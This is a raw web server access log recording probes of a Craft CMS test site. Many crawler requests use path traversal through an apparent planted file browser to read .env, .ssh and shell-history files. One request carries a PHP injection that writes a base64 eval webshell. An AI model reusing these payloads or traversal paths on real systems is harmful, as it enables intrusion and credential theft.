216.73.216.46 - - [21/Aug/2025:12:16:11 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F3534f%2F..%2Forder%2F.. HTTP/2.0" 200 2101 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 104 0.004 "36642" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:14 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F897c2d24%2F..%2Fe371ba21 HTTP/2.0" 200 1490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 350 0.004 "8181" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:17 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fpixelandtonic%2F..%2Fbin HTTP/2.0" 200 1654 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.003 "16623" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:20 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2F..%2F..%2F.env.example HTTP/2.0" 200 1231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 123 0.003 "3764" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:23 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2F..%2F..%2F.env.example HTTP/2.0" 200 1231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 122 0.003 "3765" "0.002" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:26 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F92fd50c%2F..%2Fa4303b5a HTTP/2.0" 200 1497 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.003 "8156" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:29 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Ftecnickcom%2F..%2Fralouphie HTTP/2.0" 200 1404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 108 0.003 "6718" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:32 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fplugins%2Fcraft-content-buddy%2FLICENSE.md HTTP/2.0" 200 2120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 125 0.004 "5382" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:35 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F7196177a%2F..%2F46fa01b6 HTTP/2.0" 200 1480 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.004 "7306" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:38 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F3534f%2F..%2F1cefc%2F.. HTTP/2.0" 200 2103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.006 "36642" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:41 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2F..%2F..%2Fpublic HTTP/2.0" 200 2125 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 118 0.004 "38105" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:44 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2F..%2F..%2Fpublic HTTP/2.0" 200 2116 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 118 0.004 "38106" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:47 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.config%2F..%2F.%2Ftmp HTTP/2.0" 200 1370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 76 0.003 "6009" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:50 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F897c2d24%2F..%2Fe9e49845 HTTP/2.0" 200 1543 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "10278" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:53 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.local%2F..%2Fapps%2F.. HTTP/2.0" 200 1708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 77 0.003 "18234" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:56 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F7196177a%2F..%2F3013a1e4 HTTP/2.0" 200 1523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.003 "8518" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:16:59 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F92fd50c%2F..%2F9a483874 HTTP/2.0" 200 1575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "11553" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:17:02 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2Fcpresources%2Ff8e62810%2Ff8e62810 HTTP/2.0" 200 1497 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 113 0.003 "9220" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:17:05 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Ftecnickcom%2F..%2Fvlucas HTTP/2.0" 200 1400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.003 "6663" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:17:08 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fplugins%2Fcraft-content-buddy%2FCHANGELOG.md HTTP/2.0" 200 1037 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 127 0.003 "3262" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:17:10 -0400] "GET /order/files/2023-01/2023-01/index.php?ARRAY=7o2230223n313735353739363632392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353739333032392q3261323734666532633131336237613734646635393135643463323766373062222p2232223n226165353331623136366433393135323731333437616631653234663030363265222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p2262696r675s70617373223n2231372q33332q35332q36392q37372q38312q3231227q HTTP/2.0" 200 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3970 Safari/537.36 Edg/79.0.143.5" "62.164.177.242" 664 1.026 "967" "1.027" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:17:11 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fstorage%2F..%2Ftemplates HTTP/2.0" 200 1585 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.003 "13249" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:17:14 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F7196177a%2F..%2F9e85d86b HTTP/2.0" 200 1544 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.003 "9675" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:17:17 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F3534f%2F..%2F1cefc%2Findex.php HTTP/2.0" 200 212699 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.039 "946781" "0.040" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:17:20 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F897c2d24%2F..%2Fa4303b5a HTTP/2.0" 200 1500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "8174" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:17:23 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fassets%2Fjs%2F.%2F. HTTP/2.0" 200 1501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.005 "9157" "0.006" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:17:26 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F3534f%2F..%2Ff7c78%2Ff7c78 HTTP/2.0" 200 1487 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.008 "8920" "0.007" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:32 -0400] "GET / HTTP/2.0" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" "2a0b:4141:820:88d::2" 366 0.509 "0" "0.509" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:33 -0400] "GET /shop/products HTTP/2.0" 200 6702 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" "2a0b:4141:820:88d::2" 44 0.524 "74727" "0.524" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:37 -0400] "GET / HTTP/2.0" 302 0 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" "2a0b:4141:820:88d::2" 864 0.523 "0" "0.522" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:37 -0400] "GET /shop/products HTTP/2.0" 200 6698 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" "2a0b:4141:820:88d::2" 1058 0.540 "74727" "0.541" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:39 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 500 174676 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" "2a0b:4141:820:88d::2" 1225 0.406 "174676" "0.407" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:41 -0400] "GET /index.php?p=admin/dashboard&a=<?=file_put_contents(\x22c057546adf31.php\x22,base64_decode(\x22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K\x22));die();?> HTTP/2.0" 302 0 "-" "PycURL/7.43.0.1 libcurl/7.86.0 OpenSSL/1.1.1 zlib/1.2.11 c-ares/1.18.1 libidn2/2.0.4 librtmp/2.3" "2a0b:4141:820:88d::2" 631 0.458 "0" "0.458" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:42 -0400] "GET /index.php?p=admin/dashboard HTTP/2.0" 302 0 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" "2a0b:4141:820:88d::2" 761 0.421 "0" "0.421" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:43 -0400] "GET /admin/login HTTP/2.0" 200 16968 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" "2a0b:4141:820:88d::2" 1033 0.594 "59176" "0.594" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:45 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 200 126 "https://test.newsite.space/admin/login" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" "2a0b:4141:820:88d::2" 1106 0.487 "157" "0.487" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:12:17:45 -0400] "GET /c057546adf31.php HTTP/2.0" 403 449 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" "2a0b:4141:820:88d::2" 707 0.001 "859" "0.000" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:25 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fdefuse%2F.%2F. HTTP/2.0" 200 1380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 334 0.009 "6544" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:28 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Forder%2F..%2Forder%2F. HTTP/2.0" 200 1467 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.006 "8111" "0.006" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:31 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2F70f7c%2F..%2F. HTTP/2.0" 200 2113 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.005 "37221" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:34 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2F70f7c%2F..%2F. HTTP/2.0" 200 2114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 346 0.004 "37220" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:37 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F1cefc%2F..%2Forder%2F. HTTP/2.0" 200 1474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 349 0.004 "8111" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:40 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Forder%2Ffiles%2F2023-07%2F. HTTP/2.0" 200 1439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 352 0.004 "7193" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:43 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F897c2d24%2F..%2F. HTTP/2.0" 200 2348 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.004 "60184" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:46 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F92fd50c%2F..%2F.gitignore HTTP/2.0" 200 956 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.003 "3006" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:49 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fpixelandtonic%2F..%2Ftheiconic HTTP/2.0" 200 1399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.004 "6755" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:52 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F3534f%2F..%2F10bddd743f.txt HTTP/2.0" 200 19607 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.003 "28428" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:55 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F3534f%2F..%2F.%2F10bddd743f.txt HTTP/2.0" 200 19608 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.004 "28433" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:18:58 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fimages%2F..%2F..%2Fvendor HTTP/2.0" 200 2542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 116 0.004 "62932" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:01 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.%2F.local%2F..%2F.bash_history HTTP/2.0" 200 993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 82 0.003 "2914" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:04 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.local%2F..%2F.%2F.bash_history HTTP/2.0" 200 993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 82 0.004 "2920" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:07 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2F..%2F..%2Fcomposer.json HTTP/2.0" 200 1421 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 122 0.004 "5090" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:10 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2F..%2F..%2Fcomposer.json HTTP/2.0" 200 1422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 122 0.004 "5091" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:13 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.%2F.local%2F..%2F.bashrc HTTP/2.0" 200 2565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 78 0.003 "6670" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:16 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.local%2F..%2F.%2F.bashrc HTTP/2.0" 200 2563 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 78 0.003 "6676" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:19 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.cache%2F..%2F.ssh%2F. HTTP/2.0" 200 1399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 76 0.004 "6053" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:22 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fverbb%2F.%2F. HTTP/2.0" 200 1397 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 97 0.004 "7494" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:25 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F897c2d24%2F..%2F.gitignore HTTP/2.0" 200 960 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 116 0.003 "3011" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:28 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F3534f%2F..%2F3534f%2F3534f HTTP/2.0" 200 1550 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.003 "11136" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:31 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fpixelandtonic%2F..%2Ftecnickcom HTTP/2.0" 200 1397 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.003 "6744" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:34 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fconfig%2F..%2Fmodules%2F. HTTP/2.0" 200 1502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 99 0.004 "9640" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:37 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F3534f%2F..%2Fweb.config HTTP/2.0" 200 1331 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.003 "4546" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:40 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F3534f%2F..%2F.%2Fweb.config HTTP/2.0" 200 1331 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.003 "4551" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:19:43 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fimages%2F..%2F..%2F.env HTTP/2.0" 200 1334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "3787" "0.004" "test.newsite.space"
